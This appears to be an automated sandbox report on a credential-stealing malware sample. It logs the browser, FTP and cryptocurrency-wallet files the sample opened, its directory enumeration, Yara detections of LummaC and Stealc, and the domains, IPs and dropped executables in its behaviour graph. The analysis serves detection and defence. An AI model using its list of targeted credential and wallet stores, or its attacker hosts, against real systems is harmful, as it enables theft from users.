Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: number of queries: 1420
Yara detected Credential Stealer
Source: Yara match File source: 0.3.file.exe.11f72e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.11f72e0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000003.2084529738.0000000001193000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2068205912.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2043212378.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1459148229.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2082564120.0000000001191000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1477555129.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1446807409.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 136916b3ff.exe PID: 5936, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 38.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000003.2232897578.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2122542040.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2204680334.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1985396722.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2323652564.0000000000291000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.2029327781.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2207625905.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.2182412308.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1987795463.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.1970036309.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2116759682.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540733 Sample: file.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 103 studennotediw.store 2->103 105 steamcommunity.com 2->105 107 29 other IPs or domains 2->107 125 Suricata IDS alerts for network traffic 2->125 127 Found malware configuration 2->127 129 Antivirus detection for dropped file 2->129 131 16 other signatures 2->131 11 file.exe 3 2->11         started        16 8138ba21a1.exe 2->16         started        18 skotes.exe 2->18         started        20 7 other processes 2->20 signatures3 process4 dnsIp5 109 sergei-esenin.com 104.21.53.8, 443, 49757, 49763 CLOUDFLARENETUS United States 11->109 111 steamcommunity.com 104.102.49.254, 443, 49746, 49981 AKAMAI-ASUS United States 11->111 113 185.215.113.16, 49837, 49930, 49990 WHOLESALECONNECTIONSNL Portugal 11->113 85 C:\Users\user\...\J2IWSCR5FJAMGGW2VC4ET4.exe, PE32 11->85 dropped 87 C:\Users\user\...behaviorgraph4X9C8XP66LPZY0PX2HHB5N.exe, PE32 11->87 dropped 89 C:\Users\user\...\3BW8PCDTI0L77ZRRJ1.exe, PE32 11->89 dropped 173 Query firmware table information (likely to detect VMs) 11->173 175 Found many strings related to Crypto-Wallets (likely being stolen) 11->175 177 Tries to evade debugger and weak emulator (self modifying code) 11->177 195 3 other signatures 11->195 22 G4X9C8XP66LPZY0PX2HHB5N.exe 4 11->22         started        26 3BW8PCDTI0L77ZRRJ1.exe 9 1 11->26         started        28 J2IWSCR5FJAMGGW2VC4ET4.exe 13 11->28         started        91 C:\Users\...\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe, PE32 16->91 dropped 93 C:\Users\...\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe, PE32 16->93 dropped 179 Tries to steal Crypto Currency Wallets 16->179 197 2 other signatures 16->197 31 H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe 16->31         started        33 5VHE3T5UQF0Q17ZEPUURN3ZOS.exe 16->33         started        35 GVMUIWZ4K51WM0HUSRJ8R.exe 16->35         started        181 Antivirus detection for dropped file 18->181 183 Detected unpacking (changes PE section rights) 18->183 